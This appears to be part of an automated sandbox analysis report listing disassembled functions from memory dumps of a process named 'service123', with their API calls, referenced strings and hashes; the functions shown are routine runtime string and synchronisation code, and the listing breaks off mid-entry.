Opcode ID: d9d25954e0973a5d2af241dbf7f16948bd270997262effad8227d2b76615fa80
Instruction ID: e25d727ffd26b6a921f7580c9bc92bd83f365da6548cad0f1e6de4af30857b2b
Opcode Fuzzy Hash: d9d25954e0973a5d2af241dbf7f16948bd270997262effad8227d2b76615fa80
Instruction Fuzzy Hash: 50D128B19097598FCB40DFA8C48058EBBF0AF48354F15862EE894E7751E734D945CF92

Function 6C410F90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C410FD5

Strings

basic_string::append, xrefs: 6C41104D, 6C411059, 6C41114C, 6C41120C

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: ad4034cdbe02a87b5cd2e22de22d19e253d3986b826742ef7e6341d0c4e7c1da
Instruction ID: 4aaaf5ca85f5d3f55955acc02c6fde5e9c92127c420ade6a7f58966c112de6a6
Opcode Fuzzy Hash: ad4034cdbe02a87b5cd2e22de22d19e253d3986b826742ef7e6341d0c4e7c1da
Instruction Fuzzy Hash: EEA13C75A082159FCB00EF69C584AAEFBF1FB49354F008569E8989BB44D734E849CF92

Function 6C3AB2D0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C3A997F), ref: 6C3AB336
memcpy.MSVCRT(?,?,?,?,?,?,6C3A997F), ref: 6C3AB3A1
memcpy.MSVCRT(00000000,?,?,6C3A997F), ref: 6C3AB3E8

Strings

basic_string::assign, xrefs: 6C3AB403

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 70dbbd7667202b6d0399b9d38cc05f3e96c6fc5187154a74eae8b58de3fd7904
Instruction ID: 738d405d5c874450e3ac2242943e6a0748585da3e7262600b5da4cdb3c0ca700
Opcode Fuzzy Hash: 70dbbd7667202b6d0399b9d38cc05f3e96c6fc5187154a74eae8b58de3fd7904
Instruction Fuzzy Hash: 3F518771B0A6158FD700DF68C484A1ABBF1FF8530CB508A2DE4948BB64E731D816CF92

Function 6C3B4410 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C3B4471
memcpy.MSVCRT ref: 6C3B44DF
memcpy.MSVCRT ref: 6C3B4518

Strings

basic_string::assign, xrefs: 6C3B4534

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 76bb550b8dcb4a285ea5866032da699143c4c64a9de2867a9d1911b736f8f062
Instruction ID: fa0476154ffccfd7008bc1ed2fde56bd4d521f7ba34713f636ee298808251f93
Opcode Fuzzy Hash: 76bb550b8dcb4a285ea5866032da699143c4c64a9de2867a9d1911b736f8f062
Instruction Fuzzy Hash: 8D51BFB1B0A6118FD700DF28D58461AFBF5BFA6318F51895ED4849BB18E731D805CF92

Function 6C36E980 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C36E9AA
wcslen.MSVCRT ref: 6C36EA1A

Strings

basic_string: construction from null is not valid, xrefs: 6C36E9E2, 6C36EA52, 6C36EAC2

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 34e4c91170b114dd6a1ef2c138a5468a649a987c455031d39ae6d6ce25091272
Instruction ID: 469e7a4e93be0f1975dee44370b9aa57a29a5000b46bad7e9e8ebcff5e0d340f
Opcode Fuzzy Hash: 34e4c91170b114dd6a1ef2c138a5468a649a987c455031d39ae6d6ce25091272
Instruction Fuzzy Hash: 944180F1A157148FC700EF2CD88184AB7E0BF55214F56497DE8858BB18E231D999CFD2

Function 6C36E581 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C36E5AD
strlen.MSVCRT ref: 6C36E5FD

Strings

basic_string: construction from null is not valid, xrefs: 6C36E5CF, 6C36E61F, 6C36E66F

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 907677dde7d4c5179920b7defe4c54182f1155d5706662b1b704429ff8f8d945
Instruction ID: 5779fb61ca077f52401f28de85f8d18da77cb6eed56648e532a739b32fe20e66
Opcode Fuzzy Hash: 907677dde7d4c5179920b7defe4c54182f1155d5706662b1b704429ff8f8d945
Instruction Fuzzy Hash: F33182B16153248FCB00EF2CD485C9ABBE4BF05618B56486EE8C48B711D736EC59CFA2

Function 6C359660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C3596B2
MultiByteToWideChar.KERNEL32 ref: 6C3596F5

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: e7c84792696b85223143ff537ca57c92a209b509e631c557e9215bcba9e78a15
Instruction ID: 2dabe29d8e5af626cb9c6e83bd24b3782596742429a3752554e3432a1399e7b1
Opcode Fuzzy Hash: e7c84792696b85223143ff537ca57c92a209b509e631c557e9215bcba9e78a15
Instruction Fuzzy Hash: 3C3105B45093418FDB00DF29E18465ABBF0BF86318F54891EE8D88B651E3B6D859CF52

Function 00017C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00017C92
MultiByteToWideChar.KERNEL32 ref: 00017CD5

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 8caf005b605a30bb6cfc7a228f789e16f9b737f5d31f0722850da4c8baab05f1
Instruction ID: 83a7de97284f3b4a2a10087f81e1e7252389e266703bf8a3b0ffa340bc7e7e0c
Opcode Fuzzy Hash: 8caf005b605a30bb6cfc7a228f789e16f9b737f5d31f0722850da4c8baab05f1
Instruction Fuzzy Hash: 9331F4B050D3418FD750DF28E5846AABBF0BF86314F04891DE8988B351E7B6D989CB93

Function 6C34F511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C34F5C1

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: cdbc4f00805ec3eefd07195ad211c3c0f0f5f66d92aee9104502aa02f48168ca
Instruction ID: c9ef09266a4f038f2744e9eee8a043daafc55080bec5579fd93d7c210fb5d5b3
Opcode Fuzzy Hash: cdbc4f00805ec3eefd07195ad211c3c0f0f5f66d92aee9104502aa02f48168ca
Instruction Fuzzy Hash: 4C414EB0A0A3018FDB10EF2AD5847267BF1FB4A318F19C65CD8984B659D336D546CFA2

Function 6C34F6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C34F751

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 6c80d45fa90eba49e5ead200dc7005c6c1361a813ecd716e63305a85cfd862a0
Instruction ID: d8540a9d27cd7971f591417ab096a6e36f4b17e5943f5b38cb7246ceda2c2118
Opcode Fuzzy Hash: 6c80d45fa90eba49e5ead200dc7005c6c1361a813ecd716e63305a85cfd862a0
Instruction Fuzzy Hash: 9E313BB0A093018FDB00EF2AD5843267FF1FB4A31CF198659D8944B699D37AD445CFA2

Function 6C34F9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C34FA72
CreateSemaphoreW.KERNEL32 ref: 6C34FAB7
WaitForSingleObject.KERNEL32 ref: 6C34FB00

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 1e78bf8b0fa50eb561709bc50d6f907e0242faef1ff412a50a724d4e75fadb50
Instruction ID: d9ac2681d062288932aef04a8eaa21a4848dedeb2f7987c893f4595f311cbcdf
Opcode Fuzzy Hash: 1e78bf8b0fa50eb561709bc50d6f907e0242faef1ff412a50a724d4e75fadb50
Instruction Fuzzy Hash: C6311AB0A093018FDB11EF2EC5843267BF1FB4A318F198659E8988B685D376D545CFA2

Function 6C34FB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C34FBF2
CreateSemaphoreW.KERNEL32 ref: 6C34FC37
WaitForSingleObject.KERNEL32 ref: 6C34FC80

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 26fa318b3307fc896c2f7082f1b0df52d9b0fd3a5481774342e0282ae813be27
Instruction ID: 5329e79d7f19357608e3c7f99a058ff936e866a19fc32ad66ca55f6f05848591
Opcode Fuzzy Hash: 26fa318b3307fc896c2f7082f1b0df52d9b0fd3a5481774342e0282ae813be27
Instruction Fuzzy Hash: B0310DB06093019FDB01FF2AC5843267BF1FB4A758F158658EC948B689D376D845CFA2

Function 6C3455A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3472FE

Strings

this, xrefs: 6C3455B3
}, xrefs: 6C347392
{parm#, xrefs: 6C3472D9

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 986cc0fe00bebbff93bd5642bc2adfce0ca745d036eb1ae0172eee5d14ef2ae3
Instruction ID: d408d21d46338e10e9f097f4c7ac6e1d0aeefa9e7b1944f65b72411d68f99204
Opcode Fuzzy Hash: 986cc0fe00bebbff93bd5642bc2adfce0ca745d036eb1ae0172eee5d14ef2ae3
Instruction Fuzzy Hash: 5E215C71509642CBD7119F18C0847A9BBE1AF92318F18C5BEDCC84FA0AD7799485CFA2

Function 00011001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0001106B
__p__fmode.MSVCRT ref: 00011070
__p__commode.MSVCRT ref: 0001107D

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: e3b3711b674ea60348c126ab866b02dcaa7b400c081b2e4b6e25ad549ab9d718
Instruction ID: 83445751f9b28ba522ec8f428a9c2b8819535da2ff6e90da490e63ebdf4b322c
Opcode Fuzzy Hash: e3b3711b674ea60348c126ab866b02dcaa7b400c081b2e4b6e25ad549ab9d718
Instruction Fuzzy Hash: 53219D70904201CBD36AEF20D8053E633F2BB08344F95C569D6584B266E7BAD8C7DB91

Function 6C3B9F70 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C3B9F85
strlen.MSVCRT ref: 6C3B9F8F
memcpy.MSVCRT ref: 6C3B9FB8
setlocale.MSVCRT ref: 6C3B9FCC

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 0cccad25785adaee55cc00935f1bf699b17c6611f313c9499a79f5a093558aea
Instruction ID: b1e3c5069aba72ccab86d32ea008bf7929cb341e195db8e7ba778bb89a0777ff
Opcode Fuzzy Hash: 0cccad25785adaee55cc00935f1bf699b17c6611f313c9499a79f5a093558aea
Instruction Fuzzy Hash: 37F0D4B55093119AD300BF689445BAFFAF4EF80698F418D1DE4C88BB10E779C8598BA3

Function 6C354C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C354C66
@, xrefs: 6C354D17

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 6e55bac2021fe822632a821cc5fe396d524f192ed7f481a1c632872813f66caf
Instruction ID: 4e33c271e394d47cddd4dd28d7cc67edd82ab6898b92716aea7cdcf066219b0a
Opcode Fuzzy Hash: 6e55bac2021fe822632a821cc5fe396d524f192ed7f481a1c632872813f66caf
Instruction Fuzzy Hash: 97A17B7160C3958BD724CF25C080B9ABBE1BB85318F558A1DE8DC8B641D736E569CF82

Function 00014558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 00014596
@, xrefs: 00014647

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: eb6e2da3e0e5ac0e7e3098f84d646a87694d7153aef45143769255f435afa369
Instruction ID: 9cf0ecca9cb3e6aad33ac1b7ce955278069db5022cb0f5386787fc8497302d7c
Opcode Fuzzy Hash: eb6e2da3e0e5ac0e7e3098f84d646a87694d7153aef45143769255f435afa369
Instruction Fuzzy Hash: 2FA18F7550C3918BC771CF24D0803EABBE2BB85358F158A1DE8DC9B262D735D989DB82

Function 6C3552F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C35548E

Part of subcall function 6C352F00: fputc.MSVCRT ref: 6C352FC8

Strings

@, xrefs: 6C354D17
(null), xrefs: 6C3552F7

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: e7f55d0b454d472b18171476dd998bcc05f9bdd8ec00aeb03c95d393e674e409
Instruction ID: 81b9ed4e20dc66f42454a1ec0ab682d61565b3e77ccf9eb27d76790ea578a52a
Opcode Fuzzy Hash: e7f55d0b454d472b18171476dd998bcc05f9bdd8ec00aeb03c95d393e674e409
Instruction Fuzzy Hash: 2791AF7160C3958BD7218F25C090B9ABBE1BF85318F958A1DE8DC87741D736E52ACF82

Function 00014C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00014DBE

Part of subcall function 00012830: fputc.MSVCRT ref: 000128F8

Strings

(null), xrefs: 00014C27
@, xrefs: 00014647

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 2dbd66f1904c09fc8fcb584568262d9cd7ac36a33a707f8701c03d9dfe9afc8d
Instruction ID: 94d29ccb0adee78b6c1ebbadda5b154629a4eaeb5665c4ecfbac8a962bd12b29
Opcode Fuzzy Hash: 2dbd66f1904c09fc8fcb584568262d9cd7ac36a33a707f8701c03d9dfe9afc8d
Instruction Fuzzy Hash: 89918C756083918BD7718F24C0803EABBE2BB85714F158A1DE8DC973A2D735D9869B82

Function 6C3D5DB0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3D5DEA
wcslen.MSVCRT ref: 6C3D5E7C
wcslen.MSVCRT ref: 6C3D5F0E
strlen.MSVCRT ref: 6C3D5FA0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

